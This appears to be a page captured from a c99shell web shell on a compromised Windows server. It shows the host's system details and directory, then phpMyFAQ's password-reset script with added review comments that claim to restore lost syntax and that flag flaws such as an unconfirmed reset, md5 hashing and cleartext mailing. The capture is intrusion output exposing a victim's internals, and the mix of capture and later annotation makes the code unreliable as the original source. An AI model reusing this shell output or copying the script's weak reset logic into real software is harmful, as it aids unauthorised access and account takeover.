!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\aulavirtual\admin\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]


Viewing file:     password.php (5.55 KB)      -rw-rw-rw-
<?php
/**
* $Id: password.php,v 1.4.2.9.2.4 2007/04/24 20:28:55 matteo Exp $
*
* Reset a forgotten password to a new one
*
* @author       Thorsten Rinne <thorsten@phpmyfaq.de>
* @since        2004-05-11
* @copyright    (c) 2004 - 2007 phpMyFAQ Team
*
* The contents of this file are subject to the Mozilla Public License
* Version 1.1 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
*/

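// Bootstrap: resolve the installation root, load the core helpers and
// normalise the request before anything else runs.
// (The captured listing had lost its commas and '=' signs; they are restored here.)

// Absolute path of the directory above the one holding this file.
define('PMF_ROOT_DIR', dirname(dirname(__FILE__)));

require_once(PMF_ROOT_DIR.'/inc/functions.php');
require_once(PMF_ROOT_DIR.'/inc/init.php');
// NOTE(review): presumably the guard constant that other admin includes test
// for before running - confirm against those files.
define('IS_VALID_PHPMYFAQ_ADMIN', null);
PMF_Init::cleanRequest();

// Just for security reasons - thanks to Johannes for the hint
// Both values are request-controlled. PHP_SELF is printed into the form
// action further down, so it is percent-encoded here (with '/' restored so
// the path stays usable) to keep markup characters out of the attribute.
$_SERVER['PHP_SELF'] = str_replace('%2F', '/', rawurlencode($_SERVER['PHP_SELF']));
$_SERVER['HTTP_USER_AGENT'] = urlencode($_SERVER['HTTP_USER_AGENT']);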



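/* read configuration */
// NOTE(review): $DB (type, server, user, password, db, prefix) is read below
// but not set in this file - presumably it comes from one of these includes.
// (The captured listing had lost its commas and '=' signs; they are restored here.)
require_once(PMF_ROOT_DIR."/inc/data.php");
require_once(PMF_ROOT_DIR."/inc/config.php");
require_once(PMF_ROOT_DIR."/inc/constants.php");

/* include classes and functions */
require_once(PMF_ROOT_DIR."/inc/db.php");
// Table-name prefix used by every query on this page.
define("SQLPREFIX", $DB["prefix"]);
// Pick the driver for the configured database type, then open the connection.
$db = db::db_select($DB["type"]);
$db->connect($DB["server"], $DB["user"], $DB["password"], $DB["db"]);
require_once(PMF_ROOT_DIR."/inc/category.php");
require_once(PMF_ROOT_DIR."/inc/idna_convert.class.php");
// Used further down to encode the mail addresses passed to mail().
$IDN = new idna_convert;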


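// get language (default: english)
// (The captured listing had lost its '=' signs and the ':' of the ternary;
// they are restored here.)
$pmf = new PMF_Init();
$LANGCODE = $pmf->setLanguage(isset($PMF_CONF['detection']), $PMF_CONF['language']);

// The language code becomes part of an include path, so it is only used when
// it is a key of the $languageCodes allow-list; anything else falls back to
// the English file.
if (isset($LANGCODE) && isset($languageCodes[strtoupper($LANGCODE)])) {
    require_once(PMF_ROOT_DIR."/lang/language_".$LANGCODE.".php");
} else {
    $LANGCODE = "en";
    require_once(PMF_ROOT_DIR."/lang/language_en.php");
}

/* header of the admin page */
require_once ("header.php");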
?>
</div>
<div id="bodyText">
<?php
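// Dispatch on ?action=. Only "sendmail" does any work; with no action (or an
// unknown one) the request form is shown.
// (The captured listing had lost its commas, semicolons and '=' signs; they
// are restored here.)
if (isset($_GET["action"]) && $_GET["action"] == "newpassword") {
    // no handler in this file
} elseif (isset($_GET["action"]) && $_GET["action"] == "savenewpassword") {
    // no handler in this file
} elseif (isset($_GET["action"]) && $_GET["action"] == "sendmail") {
    if (isset($_POST["username"]) && $_POST["username"] != "" && isset($_POST["email"]) && $_POST["email"] != "" && checkEmail($_POST["email"])) {
        // SECURITY: both queries below are built by string concatenation, so
        // their safety rests entirely on escape_string() of the selected
        // driver. Move to bound parameters if the db layer offers them.
        $username = $db->escape_string($_POST["username"]);
        $email = $db->escape_string($_POST["email"]);
        $num = $db->num_rows($db->query("SELECT name, email FROM ".SQLPREFIX."faquser WHERE name = '".$username."' AND email = '".$email."'"));
        if ($num == 1) {
            $consonants = array("b","c","d","f","g","h","j","k","l","m","n","p","r","s","t","v","w","x","y","z");
            $vowels = array("a","e","i","o","u");
            $newPassword = "";
            // The original seeded rand() with srand((double)microtime()*1000000),
            // which allows at most one million seeds and makes the generated
            // password guessable. Use the CSPRNG where it exists (PHP >= 7).
            // On older runtimes fall back to the auto-seeded mt_rand(), which
            // is still NOT suitable for secrets - upgrade the runtime.
            $pickIndex = function_exists('random_int') ? 'random_int' : 'mt_rand';
            // Four consonant+vowel pairs give an 8-letter pronounceable password.
            for ($i = 1; $i <= 4; $i++) {
                $newPassword .= $consonants[$pickIndex(0, count($consonants) - 1)];
                $newPassword .= $vowels[$pickIndex(0, count($vowels) - 1)];
            }
            // SECURITY: unsalted md5() is not an adequate password hash. It is
            // kept because the login check elsewhere must change in step.
            // Migrate both sides to password_hash()/password_verify().
            $db->query("UPDATE ".SQLPREFIX."faquser SET pass = '".md5($newPassword)."' WHERE name = '".$username."' AND email = '".$email."'");

            // SECURITY: the password is replaced at once and mailed in clear
            // text, with no confirmation step. Anyone who knows a valid
            // name/e-mail pair can force a reset.
            $text = $PMF_LANG["lostpwd_text_1"]."\nUsername: ".$username."\nNew Password: ".$newPassword."\n\n".$PMF_LANG["lostpwd_text_2"];
            mail($IDN->encode($email), $PMF_CONF["title"].": username / password request", $text, "From: ".$IDN->encode($PMF_CONF["adminmail"]));
            print $PMF_LANG["lostpwd_mail_okay"];
            print "<p><img src=\"images/arrow.gif\" width=\"11\" height=\"11\" alt=\"".$PMF_LANG["ad"]."\" border=\"0\" /> <a href=\"index.php\" title=\"".$PMF_LANG["ad"]."\">".$PMF_LANG["ad"]."</a></p>";
        } else {
            // No single matching account. A reply that differs from the
            // success case tells the requester whether the pair exists.
            print $PMF_LANG["lostpwd_err_1"];
        }
    } else {
        // Missing field or an address rejected by checkEmail().
        print $PMF_LANG["lostpwd_err_2"];
    }
} else {
?>
    <form action="<?php print $_SERVER["PHP_SELF"]; ?>?action=sendmail" method="post">
    <fieldset class="login">
        <legend class="login"><?php print $PMF_LANG["ad_passwd_cop"]; ?></legend>

        <label class="left"><?php print $PMF_LANG["ad_auth_user"]; ?></label>
        <input type="text" name="username" size="30" /><br />

        <label class="left"><?php print $PMF_LANG["ad_entry_email"]; ?></label>
        <input type="text"  name="email" size="30" /><br />

        <input class="submit" style="margin-left: 190px;" type="submit" value="<?php print $PMF_LANG["msgNewContentSubmit"]; ?>" /><br />

        <p><img src="images/arrow.gif" width="11" height="11" alt="<?php print $PMF_LANG["ad_sess_back"]; ?> FAQ" border="0" /> <a href="index.php" title="<?php print $PMF_LANG["ad_sess_back"]; ?> FAQ"><?php print $PMF_LANG["ad_sess_back"]; ?></a></p>
        <p><img src="images/arrow.gif" width="11" height="11" alt="<?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES, $PMF_LANG['metaCharset']); ?> FAQ" border="0" /> <a href="../index.php" title="<?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES, $PMF_LANG['metaCharset']); ?> FAQ"><?php print PMF_htmlentities($PMF_CONF["title"], ENT_QUOTES, $PMF_LANG['metaCharset']); ?> FAQ</a></p>

    </fieldset>
    </form>
<?php
}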

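// When DEBUG is on, the database layer's SQL log is printed into the page.
// NOTE(review): the log presumably contains the statements run above, including
// the UPDATE carrying the new password hash - keep DEBUG off on any reachable host.
// (The captured listing had split each statement across lines; they are rejoined here.)
if (DEBUG == TRUE) {
    print "<p>DEBUG INFORMATION:</p>\n";
    print "<p>".$db->sqllog()."</p>";
}

// Emit the page footer, then release the database connection.
require_once ("footer.php");
$db->dbclose();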
?>


--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--